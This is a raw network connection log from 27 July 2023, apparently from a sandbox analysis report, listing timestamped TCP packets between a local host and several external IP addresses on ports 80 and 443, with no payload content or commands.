Jul 27, 2023 20:19:09.167937994 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:09.167978048 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:09.167983055 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:09.168025017 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:09.168028116 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:09.168065071 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:09.168068886 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:09.168106079 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:09.168112993 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:09.168154955 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:09.168195009 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:09.168196917 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:09.168230057 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:09.168240070 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:09.168283939 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:09.168302059 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:09.168344021 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:09.168385029 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:09.168385983 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:09.168421984 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:09.168428898 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:09.168464899 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:09.168490887 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:09.202410936 CEST	49700	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.234395027 CEST	80	49700	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:09.234749079 CEST	49700	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.235244989 CEST	49700	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.267690897 CEST	80	49700	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:09.271450043 CEST	80	49700	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:09.271644115 CEST	49700	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.433042049 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:09.433569908 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:09.474201918 CEST	49700	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.474318981 CEST	49701	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.506005049 CEST	80	49700	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:09.506068945 CEST	80	49701	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:09.506159067 CEST	49700	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.506166935 CEST	49701	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.512475014 CEST	49701	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.544194937 CEST	80	49701	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:09.546380997 CEST	80	49701	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:09.547960043 CEST	49701	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.680439949 CEST	49701	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.682611942 CEST	49702	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.712472916 CEST	80	49701	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:09.714010954 CEST	80	49702	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:09.714103937 CEST	49701	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.719598055 CEST	49702	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.743735075 CEST	49702	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.775445938 CEST	80	49702	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:09.777180910 CEST	80	49702	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:09.777293921 CEST	49702	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.927526951 CEST	49702	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.928042889 CEST	49703	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.959120035 CEST	80	49702	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:09.959384918 CEST	49702	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.959654093 CEST	80	49703	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:09.959788084 CEST	49703	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.962274075 CEST	49703	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:09.994041920 CEST	80	49703	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:09.995887041 CEST	80	49703	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:09.997668028 CEST	49703	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.106318951 CEST	49703	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.106905937 CEST	49704	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.138273954 CEST	80	49703	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:10.138499022 CEST	49703	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.138588905 CEST	80	49704	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:10.138727903 CEST	49704	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.140934944 CEST	49704	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.172744989 CEST	80	49704	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:10.178116083 CEST	80	49704	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:10.178301096 CEST	49704	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.316721916 CEST	49704	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.332700968 CEST	49705	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.348659992 CEST	80	49704	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:10.348743916 CEST	49704	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.365144968 CEST	80	49705	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:10.365276098 CEST	49705	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.365598917 CEST	49705	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.397699118 CEST	80	49705	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:10.399481058 CEST	80	49705	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:10.399871111 CEST	49705	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.527935028 CEST	49705	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.528634071 CEST	49706	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.560338020 CEST	80	49705	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:10.560386896 CEST	80	49706	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:10.560421944 CEST	49705	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.560498953 CEST	49706	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.563754082 CEST	49706	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.595504999 CEST	80	49706	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:10.597496033 CEST	80	49706	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:10.598455906 CEST	49706	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.724798918 CEST	49706	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.731281996 CEST	49707	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.756576061 CEST	80	49706	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:10.756688118 CEST	49706	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.763437986 CEST	80	49707	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:10.764065981 CEST	49707	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.825156927 CEST	49707	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.857327938 CEST	80	49707	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:10.858968019 CEST	80	49707	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:10.859049082 CEST	49707	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.998646975 CEST	49707	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:10.999686003 CEST	49708	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.031032085 CEST	80	49707	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:11.031127930 CEST	49707	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.031155109 CEST	80	49708	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:11.031475067 CEST	49708	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.086467028 CEST	49708	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.118331909 CEST	80	49708	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:11.120636940 CEST	80	49708	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:11.120814085 CEST	49708	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.261368990 CEST	49708	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.262105942 CEST	49709	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.290388107 CEST	49695	80	192.168.2.4	89.208.104.62
Jul 27, 2023 20:19:11.293313026 CEST	80	49708	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:11.293893099 CEST	80	49709	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:11.295602083 CEST	49708	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.295633078 CEST	49709	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.300151110 CEST	49709	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.331931114 CEST	80	49709	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:11.334053040 CEST	80	49709	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:11.336097956 CEST	49709	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.486377954 CEST	49709	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.488739967 CEST	49710	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.518244028 CEST	80	49709	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:11.518404961 CEST	49709	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.520659924 CEST	80	49710	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:11.522135973 CEST	49710	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.523260117 CEST	49710	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.554975986 CEST	80	49710	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:11.556427956 CEST	80	49710	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:11.557212114 CEST	49710	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.681919098 CEST	49710	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.682580948 CEST	49711	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.713845015 CEST	80	49710	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:11.713879108 CEST	80	49711	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:11.713953972 CEST	49710	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.714025021 CEST	49711	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.726449966 CEST	49711	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.757803917 CEST	80	49711	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:11.759738922 CEST	80	49711	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:11.760010004 CEST	49711	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.950783014 CEST	49711	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.951611042 CEST	49712	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.982292891 CEST	80	49711	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:11.982918978 CEST	49711	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.983329058 CEST	80	49712	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:11.983799934 CEST	49712	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:11.994368076 CEST	49712	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.026067972 CEST	80	49712	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:12.028346062 CEST	80	49712	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:12.032234907 CEST	49712	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.291574001 CEST	49712	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.292227030 CEST	49713	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.323642969 CEST	80	49712	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:12.323740005 CEST	49712	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.324069977 CEST	80	49713	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:12.324146986 CEST	49713	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.327265978 CEST	49713	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.359155893 CEST	80	49713	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:12.361634016 CEST	80	49713	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:12.361725092 CEST	49713	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.504873037 CEST	49713	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.505534887 CEST	49714	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.536863089 CEST	80	49713	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:12.537295103 CEST	80	49714	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:12.537415028 CEST	49713	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.537467957 CEST	49714	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.556917906 CEST	49714	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.589102030 CEST	80	49714	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:12.591236115 CEST	80	49714	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:12.591311932 CEST	49714	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.635051966 CEST	49715	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:12.698247910 CEST	49714	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.698916912 CEST	49716	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.730458021 CEST	80	49714	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:12.731046915 CEST	80	49716	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:12.731163979 CEST	49716	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.731226921 CEST	49714	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.731513023 CEST	49716	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.763565063 CEST	80	49716	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:12.765068054 CEST	80	49716	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:12.765166998 CEST	49716	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.901801109 CEST	80	49715	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:12.902316093 CEST	49716	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.902369976 CEST	49715	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:12.902972937 CEST	49717	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.907133102 CEST	49715	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:12.934288025 CEST	80	49717	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:12.934449911 CEST	80	49716	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:12.934576988 CEST	49716	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.934592962 CEST	49717	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.948277950 CEST	49717	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:12.979648113 CEST	80	49717	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:12.981429100 CEST	80	49717	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:12.981534958 CEST	49717	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:13.173619032 CEST	80	49715	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:13.183232069 CEST	80	49715	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:13.290600061 CEST	49715	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:13.484683037 CEST	49717	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:13.485642910 CEST	49718	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:13.516360044 CEST	80	49717	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:13.516537905 CEST	49717	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:13.517405033 CEST	80	49718	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:13.517549992 CEST	49718	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:13.587264061 CEST	49718	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:13.619123936 CEST	80	49718	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:13.620696068 CEST	80	49718	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:13.620799065 CEST	49718	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:13.633745909 CEST	49719	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:13.633786917 CEST	443	49719	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:13.633868933 CEST	49719	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:13.636286974 CEST	49719	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:13.636301041 CEST	443	49719	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:13.692143917 CEST	443	49719	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:13.692240953 CEST	49719	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:13.700448036 CEST	49719	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:13.700467110 CEST	443	49719	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:13.701258898 CEST	443	49719	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:13.701313019 CEST	49719	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:13.703660965 CEST	49719	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:13.711220026 CEST	49715	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:13.711285114 CEST	49715	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:13.746692896 CEST	49718	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:13.747348070 CEST	49720	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:13.748276949 CEST	443	49719	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:13.748487949 CEST	443	49719	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:13.748562098 CEST	49719	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:13.748578072 CEST	443	49719	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:13.748594999 CEST	443	49719	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:13.748621941 CEST	49719	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:13.748648882 CEST	49719	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:13.749521971 CEST	49719	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:13.749537945 CEST	443	49719	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:13.778573036 CEST	80	49718	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:13.778768063 CEST	49718	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:13.779207945 CEST	80	49720	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:13.779620886 CEST	49720	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:13.977808952 CEST	80	49715	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:13.977852106 CEST	80	49715	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:13.993613958 CEST	80	49715	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:14.103184938 CEST	49715	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:14.955553055 CEST	49720	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:14.987950087 CEST	80	49720	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:14.990139961 CEST	80	49720	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:14.990298033 CEST	49720	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.111752987 CEST	49720	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.124622107 CEST	49721	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.144036055 CEST	80	49720	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.144224882 CEST	49720	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.156548977 CEST	80	49721	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.156716108 CEST	49721	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.158287048 CEST	49721	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.189989090 CEST	80	49721	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.192157984 CEST	80	49721	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.192255020 CEST	49721	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.307811022 CEST	49721	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.308485031 CEST	49722	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.335748911 CEST	49715	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:15.339569092 CEST	80	49721	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.339668989 CEST	49721	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.339998960 CEST	80	49722	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.340090036 CEST	49722	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.350883961 CEST	49722	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.383033037 CEST	80	49722	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.384568930 CEST	80	49722	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.384656906 CEST	49722	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.499593019 CEST	49722	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.500288010 CEST	49723	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.531619072 CEST	80	49722	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.531727076 CEST	49722	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.532257080 CEST	80	49723	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.532439947 CEST	49723	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.532752037 CEST	49723	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.564789057 CEST	80	49723	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.566864014 CEST	80	49723	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.566972017 CEST	49723	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.602608919 CEST	80	49715	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:15.611438036 CEST	80	49715	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:15.682286024 CEST	49723	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.682884932 CEST	49724	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.694236040 CEST	49715	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:15.694291115 CEST	49715	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:15.714735031 CEST	80	49724	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.714772940 CEST	80	49723	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.714858055 CEST	49724	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.714895010 CEST	49723	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.742739916 CEST	49724	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.776001930 CEST	80	49724	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.777796030 CEST	80	49724	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.777889013 CEST	49724	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.885445118 CEST	49724	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.886101961 CEST	49725	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.917161942 CEST	80	49724	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.917241096 CEST	49724	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.917793989 CEST	80	49725	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.918083906 CEST	49725	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.927076101 CEST	49725	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.958945036 CEST	80	49725	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.960376024 CEST	80	49725	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:15.960500956 CEST	49725	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:15.960794926 CEST	80	49715	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:15.974236012 CEST	80	49715	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:16.090543985 CEST	49725	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.091218948 CEST	49726	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.103300095 CEST	49715	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:16.122329950 CEST	80	49725	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:16.122427940 CEST	49725	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.122944117 CEST	80	49726	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:16.123193979 CEST	49726	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.123748064 CEST	49726	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.155236959 CEST	80	49726	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:16.157404900 CEST	80	49726	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:16.157666922 CEST	49726	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.297754049 CEST	49726	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.298646927 CEST	49727	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.329437017 CEST	80	49726	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:16.329550028 CEST	49726	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.330555916 CEST	80	49727	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:16.332545042 CEST	49727	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.335381031 CEST	49727	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.367561102 CEST	80	49727	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:16.369267941 CEST	80	49727	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:16.369678020 CEST	49727	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.484559059 CEST	49727	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.484559059 CEST	49728	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.516448021 CEST	80	49728	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:16.516603947 CEST	49728	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.516778946 CEST	80	49727	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:16.516957998 CEST	49727	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.517286062 CEST	49728	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.549210072 CEST	80	49728	5.42.65.80	192.168.2.4
